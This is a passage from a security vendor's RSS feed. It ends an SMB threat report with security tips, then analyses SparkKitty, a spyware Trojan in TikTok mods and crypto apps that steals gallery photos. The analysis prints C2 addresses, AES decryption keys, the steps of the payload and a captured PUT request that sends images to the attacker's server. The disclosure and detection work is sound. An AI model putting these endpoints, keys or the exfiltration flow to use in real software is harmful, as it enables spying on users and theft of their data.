  731. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116842" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8.jpg" alt="" width="1408" height="921" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8.jpg 1408w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-300x196.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-1024x670.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-768x502.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-535x350.jpg 535w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-740x484.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-428x280.jpg 428w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235758/smb-threat-report8-800x523.jpg 800w" sizes="auto, (max-width: 1408px) 100vw, 1408px" /></a></p>
  732. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-116843" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9.png" alt="" width="864" height="469" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9.png 864w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-300x163.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-768x417.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-645x350.png 645w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-740x402.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-516x280.png 516w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24235827/smb-threat-report9-800x434.png 800w" sizes="auto, (max-width: 864px) 100vw, 864px" /></a></p>
  733. <h2 id="security-tips">Security tips</h2>
  734. <p>SMBs can reduce risks and ensure business continuity by investing in comprehensive cybersecurity solutions and increasing employee awareness. It is essential to implement robust measures such as spam filters, email authentication protocols, and strict verification procedures for financial transactions and the handling of sensitive information.</p>
  735. <p>Another key step toward cyber resilience is promoting awareness about the importance of comprehensive security procedures and ensuring they are regularly updated. Regular security training sessions, strong password practices, and multi-factor authentication can significantly reduce the risk of phishing and fraud.</p>
  736. <p>It is also worth noting that searching for software through search engines is an insecure practice, and should be prohibited in the organization. If you need to implement new tools or replace existing ones, make sure they are downloaded from official sources and installed on a centralized basis by your IT team.</p>
  737. <p><strong>Cybersecurity Action Plan for SMBs</strong></p>
  738. <ol>
  739. <li><strong>Define access rules for corporate resources</strong> such as email accounts, shared folders, and online documents. Monitor and limit the number of individuals with access to critical company data. Keep access lists up to date and revoke access promptly when employees leave the company. Use cloud access security brokers to monitor and control employee activities within cloud services and enforce security policies.</li>
  740. <li><strong>Regularly back up important data</strong> to ensure the preservation of corporate information in case of emergencies or cyberincidents.</li>
  741. <li><strong>Establish clear guidelines for using external services and resources.</strong> Create well-defined procedures for coordinating specific tasks, such as implementing new software, with the IT department and other responsible managers. Develop short, easy-to-understand cybersecurity guidelines for employees, with a special focus on account and password management, email protection, and safe web browsing. A well-rounded training program will equip employees with the knowledge they need and the ability to apply it in practice.</li>
  742. <li><strong>Implement specialized cybersecurity solutions</strong> that provide visibility and control over cloud services, such as <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____7a48716a2c69383d" target="_blank" rel="noopener">Kaspersky Next</a>.</li>
  743. </ol>
  744. ]]></content:encoded>
  746. <wfw:commentRss>https://securelist.com/smb-threat-report-2025/116830/feed/</wfw:commentRss>
  747. <slash:comments>0</slash:comments>
  750. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content>
  751. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content>
  752. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content>
  753. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/24201202/SL-SMB-threat-report-2025-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  754. </item>
  755. <item>
  756. <title>SparkKitty, SparkCat&#8217;s little brother: A new Trojan spy found in the App Store and Google Play</title>
  757. <link>https://securelist.com/sparkkitty-ios-android-malware/116793/</link>
  758. <comments>https://securelist.com/sparkkitty-ios-android-malware/116793/#respond</comments>
  760. <dc:creator><![CDATA[Sergey Puzan, Dmitry Kalinin]]></dc:creator>
  761. <pubDate>Mon, 23 Jun 2025 08:00:37 +0000</pubDate>
  762. <category><![CDATA[Malware descriptions]]></category>
  763. <category><![CDATA[Malware Technologies]]></category>
  764. <category><![CDATA[Google Android]]></category>
  765. <category><![CDATA[Mobile Malware]]></category>
  766. <category><![CDATA[Apple iOS]]></category>
  767. <category><![CDATA[Malware Descriptions]]></category>
  768. <category><![CDATA[Malware]]></category>
  769. <category><![CDATA[Trojan]]></category>
  770. <category><![CDATA[Cryptocurrencies]]></category>
  771. <category><![CDATA[Trojan-Spy]]></category>
  772. <category><![CDATA[SparkCat]]></category>
  773. <category><![CDATA[SparkKitty]]></category>
  774. <category><![CDATA[Mobile threats]]></category>
  775. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=116793</guid>
  776.  
  777. <description><![CDATA[SparkKitty, a new Trojan spy for iOS and Android, spreads through untrusted websites, the App Store, and Google Play, stealing images from users' galleries.]]></description>
  778. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23070415/SL-SparkKitty-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><em>Update 25.06.2025: Apple removed the malicious app from the App Store.</em></p>
  779. <p>In January 2025, we uncovered the <a href="https://securelist.com/sparkcat-stealer-in-app-store-and-google-play/115385/" target="_blank" rel="noopener">SparkCat spyware campaign</a>, which was aimed at gaining access to victims&#8217; crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device&#8217;s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we&#8217;ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.</p>
  780. <p>Here are the key facts about this new threat:</p>
  781. <ul>
  782. <li>The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play. The app is already removed from the latter.</li>
  783. <li>On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.</li>
  784. <li>The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.</li>
  785. <li>While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.</li>
  786. <li>The campaign has been active since at least February 2024.</li>
  787. </ul>
  788. <h2 id="it-all-began-with-a-suspicious-online-store">It all began with a suspicious online store…</h2>
  789. <p>During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app&#8217;s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from <strong>hxxps://moabc[.]vip/?dev=az</strong>. A sample decoded configuration file is shown below.</p><pre class="urvanov-syntax-highlighter-plain-tag">{
  790.    "links": {
  791.        "shopCenter": "https://h1997.tiktokapp.club/wap/?",
  792.        "goodsList": "https://h1997.tiktokapp.club/www/?",
  793.        "orderList": "https://h1997.tiktokapp.club/www/?",
  794.        "reg": "https://www.baidu.com",
  795.        "footbar": "https://www.baidu.com"
  796.    }
  797. }</pre><p>
  798. The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn&#8217;t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.</p>
  799. <p>Although we didn&#8217;t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.</p><pre class="urvanov-syntax-highlighter-plain-tag">&lt;div class="t-name"&gt;
  800.    &lt;div class="tit"&gt;
  801.    {{if ext=="ipa"}}
  802.         &lt;i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"&gt;&lt;/i&gt;
  803.    {{else}}
  804.         &lt;i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"&gt;&lt;/i&gt;
  805.    {{/if}}</pre><p>
  806. <h2 id="ios-app-delivery-method">iOS app delivery method</h2>
  807. <p>And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.</p>
  808. <div id="attachment_116795" style="width: 483px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116795" class="size-full wp-image-116795" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1.png" alt="iOS app download page" width="946" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1.png 946w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-139x300.png 139w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-473x1024.png 473w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-768x1663.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-710x1536.png 710w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-162x350.png 162w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-462x1000.png 462w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-129x280.png 129w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235345/sparkkitty-ios1-416x900.png 416w" sizes="auto, (max-width: 946px) 100vw, 946px" /></a><p id="caption-attachment-116795" class="wp-caption-text">iOS app download page</p></div>
  809. <p>As you know, iOS doesn&#8217;t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app&#8217;s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.</p>
  810. <p>Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees&#8217; devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.</p><pre class="urvanov-syntax-highlighter-plain-tag">&lt;?xml version="1.0" encoding="UTF-8"?&gt;
  811. &lt;!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"&gt;
  812. &lt;plist version="1.0"&gt;
  813. &lt;dict&gt;
  814. &lt;key&gt;AppIDName&lt;/key&gt;
  815. &lt;string&gt;rdcUniApp&lt;/string&gt;
  816. &lt;key&gt;ApplicationIdentifierPrefix&lt;/key&gt;
  817. &lt;array&gt;
  818. &lt;string&gt;EHQ3N2D5WH&lt;/string&gt;
  819. &lt;/array&gt;
  820. &lt;key&gt;CreationDate&lt;/key&gt;
  821. &lt;date&gt;2025-01-20T06:59:55Z&lt;/date&gt;
  822. &lt;key&gt;Platform&lt;/key&gt;
  823. &lt;array&gt;
  824. &lt;string&gt;iOS&lt;/string&gt;
  825. &lt;string&gt;xrOS&lt;/string&gt;
  826. &lt;string&gt;visionOS&lt;/string&gt;
  827. &lt;/array&gt;
  828. &lt;key&gt;IsXcodeManaged&lt;/key&gt;
  829. &lt;false/&gt;
  830. &lt;key&gt;DeveloperCertificates&lt;/key&gt;
  831. &lt;array&gt;
  832. &lt;data&gt;OMITTED&lt;/data&gt;
  833. &lt;/array&gt;
  834.  
  835. &lt;key&gt;DER-Encoded-Profile&lt;/key&gt;
  836. &lt;data&gt;OMITTED&lt;/data&gt;
  838. &lt;key&gt;Entitlements&lt;/key&gt;
  839. &lt;dict&gt;
  841. &lt;key&gt;application-identifier&lt;/key&gt;
  842. &lt;string&gt;EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp&lt;/string&gt;
  844. &lt;key&gt;keychain-access-groups&lt;/key&gt;
  845. &lt;array&gt;
  846. &lt;string&gt;EHQ3N2D5WH.*&lt;/string&gt;
  847. &lt;string&gt;com.apple.token&lt;/string&gt;
  848. &lt;/array&gt;
  850. &lt;key&gt;get-task-allow&lt;/key&gt;
  851. &lt;false/&gt;
  853. &lt;key&gt;com.apple.developer.team-identifier&lt;/key&gt;
  854. &lt;string&gt;EHQ3N2D5WH&lt;/string&gt;
  855.  
  856. &lt;/dict&gt;
  857. &lt;key&gt;ExpirationDate&lt;/key&gt;
  858. &lt;date&gt;2026-01-20T06:59:55Z&lt;/date&gt;
  859. &lt;key&gt;Name&lt;/key&gt;
  860. &lt;string&gt;syf&lt;/string&gt;
  861. &lt;key&gt;ProvisionsAllDevices&lt;/key&gt;
  862. &lt;true/&gt;
  863. &lt;key&gt;TeamIdentifier&lt;/key&gt;
  864. &lt;array&gt;
  865. &lt;string&gt;EHQ3N2D5WH&lt;/string&gt;
  866. &lt;/array&gt;
  867. &lt;key&gt;TeamName&lt;/key&gt;
  868. &lt;string&gt;SINOPEC SABIC Tianjin Petrochemical Co. Ltd.&lt;/string&gt;
  869. &lt;key&gt;TimeToLive&lt;/key&gt;
  870. &lt;integer&gt;365&lt;/integer&gt;
  871. &lt;key&gt;UUID&lt;/key&gt;
  872. &lt;string&gt;55b65f87-9102-4cb9-934a-342dd2be8e25&lt;/string&gt;
  873. &lt;key&gt;Version&lt;/key&gt;
  874. &lt;integer&gt;1&lt;/integer&gt;
  875. &lt;/dict&gt;
  876. &lt;/plist&gt;</pre><p>
  877. <center><em><strong>Example of a provisioning profile installed to run a malicious TikTok mod</strong></em></center></p>
  878. <p>In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:</p><pre class="urvanov-syntax-highlighter-plain-tag">&lt;key&gt;ProvisionsAllDevices&lt;/key&gt;
  879. &lt;true/&gt;</pre><p>
  880. It&#8217;s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:</p>
  881. <div id="attachment_116796" style="width: 2058px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116796" class="size-full wp-image-116796" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2.png" alt="Profile installation flow" width="2048" height="1454" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2.png 2048w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-300x213.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-1024x727.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-768x545.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-1536x1091.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-493x350.png 493w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-740x525.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-394x280.png 394w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235703/sparkkitty-ios2-800x568.png 800w" sizes="auto, (max-width: 2048px) 100vw, 2048px" /></a><p id="caption-attachment-116796" class="wp-caption-text">Profile installation flow</p></div>
  882. <h2 id="looking-for-copper-found-gold">Looking for copper, found gold</h2>
  883. <p>Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user&#8217;s profile window. Tapping these opened them in WebView.</p>
  884. <div id="attachment_116797" style="width: 1946px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116797" class="size-full wp-image-116797" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3.png" alt="Suspicious store opened inside a TikTok app" width="1936" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3.png 1936w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-284x300.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-968x1024.png 968w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-768x812.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-1452x1536.png 1452w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-331x350.png 331w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-740x783.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-265x280.png 265w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-800x846.png 800w" sizes="auto, (max-width: 1936px) 100vw, 1936px" /></a><p id="caption-attachment-116797" class="wp-caption-text">Suspicious store opened inside a TikTok app</p></div>
  885. <p>It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user&#8217;s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn&#8217;t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app&#8217;s other dependencies. This led to the discovery of a malicious module pretending to be <strong>AFNetworking.framework</strong>. For a touch of foreshadowing, let&#8217;s spotlight a curious detail: certain apps referred to it as <strong>Alamofire.framework</strong>, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.</p>
  886. <p>The malicious version differs from the original by a modified <strong>AFImageDownloader</strong> class and an added <strong>AFImageDownloaderTool</strong> class. Interestingly, the authors didn&#8217;t create separate initialization functions or alter the library&#8217;s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special <code>load</code> selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the <code>+[AFImageDownloader load]</code> selector, which does not exist in the original framework.</p>
  887. <div id="attachment_116798" style="width: 743px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116798" class="size-full wp-image-116798" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4.png" alt="Malicious class entry point" width="733" height="206" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4.png 733w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4-300x84.png 300w" sizes="auto, (max-width: 733px) 100vw, 733px" /></a><p id="caption-attachment-116798" class="wp-caption-text">Malicious class entry point</p></div>
  888. <p>The malicious payload functions as follows:</p>
  889. <ol>
  890. <li>It checks if the value of the <code>ccool</code> key in the app&#8217;s main <strong>Info.plist</strong> configuration file matches the string <code>77e1a4d360e17fdbc</code>. If the two differ, the malicious payload will not proceed.</li>
  891. <li>It retrieves the Base64-encoded value of the <code>ccc</code> key from the framework&#8217;s <strong>Info.plist</strong> file. This value is decoded and then decrypted using <strong>AES-256</strong> in <strong>ECB</strong> mode with the key <code>p0^tWut=pswHL-x&gt;&gt;:m?^.^)W</code> padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key <code>J9^tMnt=ptfHL-x&gt;&gt;:m!^.^)A</code>. If there&#8217;s no <code>ccc</code> key in the configuration or the key&#8217;s value is empty, the malware attempts to use the key <code>com.tt.cf</code> to retrieve an encrypted string from <strong>UserDefaults</strong> – a database where the app can store information for use in subsequent launches.</li>
  892. <li>The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.</li>
  893. <li>The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the <strong>/api/getImageStatus</strong> endpoint, transmitting app details and the user&#8217;s UUID. The server responds with the following JSON:
  894. <pre class="urvanov-syntax-highlighter-plain-tag">{"msg":"success","code":0,"status":"1"}</pre>
  895. The <code>code</code> field tells the app whether to repeat the request after a delay, with 0 meaning no, and the <code>status</code> field indicates whether it has permission to upload the photos.</li>
  896. <li>Next, the malware requests access to the user&#8217;s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.</li>
  897. </ol>
  898. <div id="attachment_116799" style="width: 1318px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116799" class="size-full wp-image-116799" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5.png" alt="Photo exfiltration and upload" width="1308" height="788" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5.png 1308w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-300x181.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-1024x617.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-768x463.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-330x200.png 330w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-581x350.png 581w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-740x446.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-465x280.png 465w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-800x482.png 800w" sizes="auto, (max-width: 1308px) 100vw, 1308px" /></a><p id="caption-attachment-116799" class="wp-caption-text">Photo exfiltration and upload</p></div>
  899. <p>Data transmission is performed directly within the selector <code>[AFImageDownloader receiptID:andPicID:]</code> by making a PUT request to the <strong>/api/putImages</strong> endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.</p><pre class="urvanov-syntax-highlighter-plain-tag">PUT /api/putImages HTTP/1.1
  900. Host: 23.249.28.88:7777
  901. Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01
  902. Connection: keep-alive
  903. Accept: */*
  904. User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)
  905. Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7
  906. Content-Length: 80089
  907. Accept-Encoding: gzip, deflate
  908. --Boundary+C9D8BE3781515E01
  909. Content-Disposition: form-data; name="appname"
  910. TikTok
  911. --Boundary+C9D8BE3781515E01
  912. Content-Disposition: form-data; name="buid"
  913. com.zhiliaoapp.musically
  914. --Boundary+C9D8BE3781515E01
  915. Content-Disposition: form-data; name="device"
  916. ios
  917. --Boundary+C9D8BE3781515E01
  918. Content-Disposition: form-data; name="userId"
  919. xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
  920. --Boundary+C9D8BE3781515E01
  921. Content-Disposition: form-data; name="uuid"
  922. xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx
  923. --Boundary+C9D8BE3781515E01
  924. Content-Disposition: form-data; name="image"; filename="&lt;name&gt;"
  925. Content-Type: image/jpeg
  926. ......JFIF.....H.H.....LExif..MM.*...................i.........&amp;.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......</pre><p>
  927. <h2 id="digging-deeper">Digging deeper</h2>
  928. <p>When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to <strong>/api/anheartbeat</strong>. The request includes information about the infected app. The Trojan expects a JSON response. If the <code>code</code> field is 0, it means communication with that C2 is allowed. The <code>status</code> flag in the JSON determines whether the Trojan can send the victim&#8217;s images to the server.</p>
  929. <div id="attachment_116801" style="width: 714px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116801" class="size-full wp-image-116801" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6.png" alt="Checking C2 addresses" width="704" height="352" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6-300x150.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6-700x350.png 700w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6-560x280.png 560w" sizes="auto, (max-width: 704px) 100vw, 704px" /></a><p id="caption-attachment-116801" class="wp-caption-text">Checking C2 addresses</p></div>
  930. <p>The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the <code>status</code> flag. If it&#8217;s set to allow file uploads, the Trojan then checks the contents of a file named <strong>aray/cache/devices/.DEVICES</strong> on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device&#8217;s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string <code>B0B5C3215E6D</code>. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to <strong>/api/putDataInfo</strong>. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It&#8217;s highly likely the attackers use this specific functionality for debugging their malicious code.</p>
